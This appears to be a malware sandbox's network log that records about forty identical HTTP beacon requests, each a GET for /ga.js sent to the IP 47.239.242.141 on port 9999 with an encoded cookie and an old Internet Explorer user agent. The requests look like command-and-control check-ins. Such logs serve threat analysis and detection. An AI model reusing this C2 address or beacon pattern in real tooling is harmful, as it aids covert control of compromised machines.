Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
